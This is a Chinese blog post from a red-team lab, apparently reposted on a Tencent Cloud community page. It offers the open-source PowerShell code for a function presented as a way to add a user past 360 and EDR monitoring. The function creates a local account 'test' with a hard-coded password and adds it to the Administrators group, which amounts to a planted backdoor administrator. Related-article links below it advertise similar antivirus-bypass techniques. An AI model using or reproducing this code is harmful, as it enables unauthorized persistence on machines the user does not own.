专栏首页鸿鹄实验室绕过监控添加用户(二)

绕过监控添加用户(二)

前几天,发给了大家一个绕过360添加用户的程序,使用谷歌浏览器下载的时候,会爆毒,然后有些人就说我加了后门。我也是醉了...

就这几个函数,你说怎么加后门??

好吧...为了避嫌,这次放出开源的powershell版的,开源你总放心了吧。

源代码如下:

function Net-User {
<#
.SYNOPSIS
    
    bypassEDR to net user require administrators.

    Author: lengyi (@鸿鹄实验室)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None

.DESCRIPTION

    Add a user named test and password test123!A

.EXAMPLE

    PS C:\> Net-User

    Name  Enabled Description
    ----  ------- -----------
    test1 True    lengyi test1 user.

.LINK

    None.

#>

[CmdletBinding()]

$Username = "test"
$P = "test123!A"
$Password = ConvertTo-SecureString $P -AsPlainText -Force
New-LocalUser $Username -Password $Password -FullName "lengyi test account" -Description "lengyi test user."
Add-LocalGroupMember -Group "administrators" -Member "test"
}

注:需要2012以上的操作系统,不然会提示函数未找到。

效果如下:

今天就先这样,觉得有用的点个在看,点个转发,感谢支持。

本文分享自微信公众号 - 鸿鹄实验室(gh_a2210090ba3f)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-05-09

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 绕过360添加用户

    https://github.com/lengjibo/RedTeamTools/blob/master/windows/bypass360%E5%8A%A0%...

    鸿鹄实验室
  • 绕过反病毒添加管理员用户小结

    我们在后渗透中时常会遇到这样的环境,即使成功拿到了目标机器的Admin/System权限后也不能添加用户和管理员组,出现这种情况的原因有很多,如:UAC、WAF...

    潇湘信安
  • quartz监控日志(二)添加监听器

    上一章介绍监控job有三种方案,其实还有一个简单方案是实现quartz的TriggerListener。

    一笠风雨任生平
  • 利用C#编写的绕过360安全卫士添加系统用户

    今天在群里看到一位大佬发的绕过360安全卫士添加系统用户权限的脚本,于是乎,我便下载下来分析可知是通过调用系统 API 函数来规避杀软:

    7089bAt@PowerLi
  • zabbix二次开发之批量添加web监控

    用户1057912
  • 原创:用zabbix api批量添加web监控

    用户1057912
  • 「R」第一个Shiny应用(二) 添加控件

    王诗翔呀
  • 基于JavaAgent的全链路监控二《通过字节码增加监控执行耗时》

    案例简述 通过上一章节的介绍《嗨!JavaAgent》,我们已经知道通过配置-javaagent:文件.jar后,在java程序启动时候会执行premain方法...

    小傅哥
  • 使用Dajngo 通过代码添加xadmin用户和权限(组)

    写view的时候,直接继承LoginRequiredMixin,如果未登录,则跳转到登陆页面

    砸漏
  • Kali Linux Web渗透测试手册(第二版) - 5.1 - 使用浏览器绕过客户端控制

    web应用程序和其他应用程序的主要区别在于web应用程序没有特定的软件或者说是用户界面,所以浏览器在用户的设备上扮演着客户端的重要角色。

    用户1631416
  • 在asp.net中为Web用户控件添加属性和事件

    在90年代初,Microsoft为Web程序员提供的ActiveServerPages(ASP...

    Java架构师必看
  • linux用户和组命令实例分析【切换、添加用户、权限控制等】

    su 切换用户 root -> 普通用户 不需要密码 普通用户之间 需要密码 普通用户->root 需要密码

    砸漏
  • 通过统计用户DNS解析记录,实现监控用户上网行为

    上次通过扫描抓包分析TTL的方式检测公司网络开放的端口,发现没有开放53端口(DNS),也就是在公司内部的主机只能用服务器自动分配的DNS,并且发现这是台内部服...

    KurtNiu
  • 【自然框架】之通用权限的Demo(二):添加人员、添加账户、添加角色里面的账户以及列表的权限验证

          看了一下上一次发Demo的日期6月15日,已经过了半个多月,这个速度也实在是太慢了。还是心情的原因,恩,心理承受能力太弱了,哈哈。不过还是要坚持的,...

    用户1174620
  • 第四章:使用Druid作为SpringBoot项目数据源(添加监控)

    恒宇少年
  • 想过为你的应用加上skywalking(链路监控)吗?

    skywalking是什么?为什么要给你的应用加上skywalking? 在介绍skywalking之前,我们先来了解一个东西,那就是APM(Applicat...

    极客运维圈
  • Struts2+DAO层实现实例03——添加监听器跟踪用户行为

      同时,Action中获取Application,Session,request的方法(在此只列出一种)更多方法

    Rekent
  • Waf功能、分类与绕过

    Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。

    婷婷的橙子
  • 基于 HTML5 的 WebGL 自定义 3D 摄像头监控模型

    随着视频监控联网系统的不断普及和发展, 网络摄像机更多的应用于监控系统中,尤其是高清时代的来临,更加快了网络摄像机的发展和应用。

    HT_hightopo

扫码关注云+社区

领取腾讯云代金券